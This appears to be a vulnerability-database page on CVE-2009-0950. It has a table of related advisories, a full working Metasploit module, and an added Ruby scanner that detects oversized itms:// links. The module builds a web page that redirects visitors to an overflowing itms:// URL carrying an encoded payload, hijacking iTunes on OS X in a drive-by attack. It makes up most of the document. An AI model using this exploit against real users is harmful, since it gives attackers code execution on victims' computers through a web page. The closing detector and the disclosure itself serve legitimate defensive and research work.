| Title | Published | Views | Family |
|---|---|---|---|
| Apple iTunes 8.1.x (daap) Buffer overflow remote exploit | 14 Jan 2010 00:00 | – | zdt |
| Apple iTunes 8.1.1 (ITMS) Multiple Protocol Handler BOF Exploit (meta) | 3 Jun 2009 00:00 | – | zdt |
| Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win) | 12 Jun 2009 00:00 | – | zdt |
| iTunes < 8.2 Remote Overflow | 18 Aug 2004 00:00 | – | nessus |
| Apple iTunes < 8.2 itms: URI Handling Overflow (credentialed check) | 2 Jun 2009 00:00 | – | nessus |
| Apple iTunes < 8.2 itms: URI Handling Overflow (uncredentialed check) | 2 Jun 2009 00:00 | – | nessus |
| iTunes < 8.2 itms: URL Stack Overflow (Mac OS X) | 2 Jun 2009 00:00 | – | nessus |
| CVE-2009-0950 | 3 Jun 2009 00:00 | – | circl |
| Apple iTunes Protocol Handler Stack Buffer Overflow (CVE-2009-0950) | 1 Feb 2010 00:00 | – | checkpoint_advisories |
| CVE-2009-0950 | 2 Jun 2009 18:00 | – | cve |
```ruby
##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow in iTunes
        itms:// URL parsing. It is accessible from the browser and
        in Safari, itms urls will be opened in iTunes automatically.
        Because iTunes is multithreaded, only vfork-based payloads should
        be used.
      },
      'Author'         => [ 'Will Drewry <[email protected]>' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: $',
      'References'     =>
        [
          ['CVE', 'CVE-2009-0950'],
          ['URL', 'http://support.apple.com/kb/HT3592'],
          ['URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html'],
        ],
      'Payload'        =>
        {
          'Space'          => 1024, # rough estimate of what browsers will pass.
          'DisableNops'    => true, # don't pad out the space.
          'BadChars'       => '',
          # The encoder must be URL-safe otherwise it will be automatically
          # URL encoded.
          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX', # See the comments below
              'BufferOffset'   => 3,     # See the comments below
            },
        },
      'Targets'        =>
        [
          [
            'OS X',
            {
              'Platform' => [ 'osx' ],
              'Arch'     => ARCH_X86,
              'Addr'     => 'ATe'
            },
          ],
          [
            'Windows (not done yet)',
            {
              'Platform' => [ 'win' ],
              'Arch'     => ARCH_X86,
              'Addr'     => 'CCCC'
            },
          ],
        ],
      'DisclosureDate' => 'June 1, 2009',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT',   [ true, "The local port to listen on.", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
      ], self.class)
  end

  # Generate distribution script, which calls our payload using JavaScript.
  def generate_itms_page(p)
    # Set the base itms url.
    # itms:// or itmss:// can be used. The trailing colon is used
    # to start the attack. All data after the colon is copied to the
    # stack buffer.
    itms_base_url = "itms://:"
    itms_base_url << "A"*268           # Fill up the real buffer
    itms_base_url << "XXXXAAAAZZZZYYYY" # $ebx, $esi, $edi, $ebp
    itms_base_url << target['Addr']    # hullo there, jmp *%ecx!

    # The first '/' in the buffer will terminate the copy to the stack buffer.
    # In addition, $ecx will be left pointing to the last 6 bytes of the heap
    # buffer containing the full URL. However, if a colon and a ? occur after
    # the value in ecx will point to that point in the heap buffer. In our
    # case, it will point to the beginning. The ! is there to make the
    # alphanumeric shellcode execute easily. (This is why we need an offset
    # of 3 in the payload).
    itms_base_url << "/:!?" # Truncate the stack overflow and prep for payload
    itms_base_url << p      # Wooooooo! Payload time.

    # We drop on a few extra bytes as the last few bytes can sometimes be
    # corrupted.
    itms_base_url << "AAAA"

    # Use the pattern creator to simplify exploit creation :)
    # itms_base_url << Rex::Text.pattern_create(1024,
    #                                           Rex::Text::DefaultPatternSets)

    # Return back an example URL. Using an iframe doesn't work with all
    # browsers, but that's easy enough to fix if you need to.
    return String(<<-EOS)
<html><head><title>iTunes loading . . .</title></head>
<body>
<script>document.location.assign("#{itms_base_url}");</script>
<p>iTunes should open automatically, but if it doesn't, click to
<a href="#{itms_base_url}">continue</a>.</p>
</body>
</html>
    EOS
  end

  def on_request_uri(cli, request)
    print_status("Generating payload...")
    return unless (p = regenerate_payload(cli))
    #print_status("=> #{payload.encoded}")
    print_status("=> #{payload.encoded.length} bytes")

    print_status("Generating HTML container...")
    page = generate_itms_page(payload.encoded)
    #print_status("=> #{page}")

    print_status("Sending itms page to #{cli.peerhost}:#{cli.peerport}")
    header = { 'Content-Type' => 'text/html' }
    send_response_html(cli, page, header)

    handler(cli)
  end
end
```
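The module's own comments describe the trigger precisely: everything after `itms://` up to the first `/` is copied into a 268-byte stack buffer. A defender can turn that condition around and flag pages or proxy logs that carry such links. The scanner below is an added example, not part of the Metasploit module or of the Vulners page; the HTML it inspects is a constructed sample, and the 268-byte threshold is taken from the `"A"*268` fill in the module.

```ruby
# Added example: flag itms:/itmss: links whose copied segment is longer
# than the stack buffer the vulnerable handler uses (CVE-2009-0950).

# Size of the stack buffer, taken from the module's "A"*268 fill.
ITMS_STACK_BUFFER = 268

# Pull every itms:// or itmss:// URL out of a page body, whether it sits in
# an href attribute or inside a JavaScript string.
def extract_itms_urls(html)
  html.scan(/itms{1,2}:\/\/[^"'\s<>]*/i)
end

# Length of the portion the handler copies to the stack: the text after
# "scheme://" up to (not including) the first '/'.
def copied_segment_length(url)
  rest = url.sub(/\Aitms{1,2}:\/\//i, '')
  rest.split('/', 2).first.to_s.length
end

# Return [url, length] pairs for links whose copied segment exceeds the
# buffer size; a legitimate store link never comes close to that length.
def suspicious_itms_links(html, threshold = ITMS_STACK_BUFFER)
  extract_itms_urls(html)
    .map { |u| [u, copied_segment_length(u)] }
    .select { |_, len| len > threshold }
end

# Constructed sample page: one benign store link and one link shaped like
# the module's output (colon, long filler, then the "/:!?" terminator).
SAMPLE_HTML = <<~HTML
  <a href="itms://itunes.apple.com/us/app/example/id123">Open in iTunes</a>
  <script>document.location.assign("itms://:#{'A' * 300}/:!?payloadgoeshere");</script>
HTML

if __FILE__ == $PROGRAM_NAME
  suspicious_itms_links(SAMPLE_HTML).each do |url, len|
    puts "suspicious itms link: copied segment #{len} bytes (> #{ITMS_STACK_BUFFER}): #{url[0, 40]}..."
  end
end
```

Run it over fetched HTML bodies or a web proxy's response log; any hit is worth quarantining, since the copied segment of a real iTunes Store link is a hostname, not hundreds of bytes.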